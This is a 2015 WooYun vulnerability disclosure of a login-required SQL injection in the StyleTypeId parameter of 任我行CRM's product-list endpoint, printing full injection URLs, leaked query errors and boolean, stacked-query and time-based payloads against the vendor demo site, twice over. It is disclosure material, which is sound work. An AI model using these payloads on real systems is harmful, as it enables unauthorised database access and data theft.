当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102424

漏洞标题:任我行CRM鸡肋sql注入

相关厂商:任我行CRM

漏洞作者: 路人甲

提交时间:2015-03-20 12:58

修复时间:2015-06-23 11:46

公开时间:2015-06-23 11:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-20: 细节已通知厂商并且等待厂商处理中
2015-03-25: 厂商已经确认,细节仅向厂商公开
2015-03-28: 细节向第三方安全合作伙伴开放
2015-05-19: 细节向核心白帽子及相关领域专家公开
2015-05-29: 细节向普通白帽子公开
2015-06-08: 细节向实习白帽子公开
2015-06-23: 细节向公众公开

简要描述:

详细说明:

WooYun: 任我行CRM/OA的一些SQL注入漏洞
比较鸡肋,需要用户登陆。
官网各个demo测试。
demo2:demodemo
http://show.wecrm.com/xt/SystemManage/GetProductDataList/?pageIndex=1&pageSize=30&Keywords=&StyleTypeId='%23&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
{"error":{"errorCode":-1,"message":"'#' 附近有语法错误。\r\n字符串 ' order by a.CreateDate desc\r\n\t\tset @intRecordCount=@@rowcount\r\n\r\n\t\tSELECT RecordCount=@intRecordCount,a.*,c.[Name] AS [Classification1Name],d.[Name] AS [Classification2Name],e.[Name] AS [Classification3Name] ,isnull(f.Name,') as DepartmentName,isnull(g.Name,') as StyleName \r\n\t\t\tFROM [CRM_Commodity] AS a\r\n\t\t\tLEFT JOIN [CRM_CommodityClassification1] AS c ON c.[ID] = a.[Classification1]\r\n\t\t\tLEFT JOIN [CRM_CommodityClassification2] AS d ON d.[ID] = a.[Classification2]\r\n\t\t\tLEFT JOIN [CRM_CommodityClassification3] AS e ON e.[ID] = a.[Classification3]\r\n\t\t\tleft JOIN [CRM_Department] AS f ON f.[TypeID] = a.[Department]\r\n\t\t\tleft JOIN [CRM_CommodityStyle] AS g ON g.[TypeID] = a.[Style] \r\n\t\t\tinner JOIN\r\n\t\t\t(SELECT TOP 30 pk\r\n\t\t\tFROM @tblPK\r\n\t\t\tWHERE id >=\r\n\t\t\t\t\t (\r\n\t\t\t\t\t SELECT ISNULL(MAX(id),0) \r\n\t\t\t\t\t FROM \r\n\t\t\t\t\t\t\t(\r\n\t\t\t\t\t\t\tSELECT TOP 1 id FROM @tblPK order by id\r\n\t\t\t\t\t\t\t) A\r\n\t\t\t\t\t )\r\n\t\t\tORDER BY id) tblPK ON a.id = tblPK.PK \r\n\t\t\t order by a.CreateDate desc\r\n\t\t\t\t\r\n\t' 后的引号不完整。","errorType":1},"value":null}
http://show.wecrm.com/xt/SystemManage/GetProductDataList/?pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%'%20AND%201579=1579%20and%20'%'='&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
正常返回了
Place: GET
Parameter: StyleTypeId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%' AND 1579=1579 AND '%'='&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%'; WAITFOR DELAY '0:0:5'--&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%' WAITFOR DELAY '0:0:5'--&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
---

漏洞证明:

比较鸡肋,需要用户登陆。
普通用户登陆,查看消息,选择一条消息,然后点击导出到记事本。
官网各个demo测试。
demo1:demodemo
http://show.wecrm.com/xt/SystemManage/GetProductDataList/?pageIndex=1&pageSize=30&Keywords=&StyleTypeId='%23&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
{"error":{"errorCode":-1,"message":"'#' 附近有语法错误。\r\n字符串 ' order by a.CreateDate desc\r\n\t\tset @intRecordCount=@@rowcount\r\n\r\n\t\tSELECT RecordCount=@intRecordCount,a.*,c.[Name] AS [Classification1Name],d.[Name] AS [Classification2Name],e.[Name] AS [Classification3Name] ,isnull(f.Name,') as DepartmentName,isnull(g.Name,') as StyleName \r\n\t\t\tFROM [CRM_Commodity] AS a\r\n\t\t\tLEFT JOIN [CRM_CommodityClassification1] AS c ON c.[ID] = a.[Classification1]\r\n\t\t\tLEFT JOIN [CRM_CommodityClassification2] AS d ON d.[ID] = a.[Classification2]\r\n\t\t\tLEFT JOIN [CRM_CommodityClassification3] AS e ON e.[ID] = a.[Classification3]\r\n\t\t\tleft JOIN [CRM_Department] AS f ON f.[TypeID] = a.[Department]\r\n\t\t\tleft JOIN [CRM_CommodityStyle] AS g ON g.[TypeID] = a.[Style] \r\n\t\t\tinner JOIN\r\n\t\t\t(SELECT TOP 30 pk\r\n\t\t\tFROM @tblPK\r\n\t\t\tWHERE id >=\r\n\t\t\t\t\t (\r\n\t\t\t\t\t SELECT ISNULL(MAX(id),0) \r\n\t\t\t\t\t FROM \r\n\t\t\t\t\t\t\t(\r\n\t\t\t\t\t\t\tSELECT TOP 1 id FROM @tblPK order by id\r\n\t\t\t\t\t\t\t) A\r\n\t\t\t\t\t )\r\n\t\t\tORDER BY id) tblPK ON a.id = tblPK.PK \r\n\t\t\t order by a.CreateDate desc\r\n\t\t\t\t\r\n\t' 后的引号不完整。","errorType":1},"value":null}
http://show.wecrm.com/xt/SystemManage/GetProductDataList/?pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%'%20AND%201579=1579%20and%20'%'='&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
正常返回了
Place: GET
Parameter: StyleTypeId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%' AND 1579=1579 AND '%'='&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%'; WAITFOR DELAY '0:0:5'--&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%' WAITFOR DELAY '0:0:5'--&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
---

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-03-25 11:45

厂商回复:

最新状态:

暂无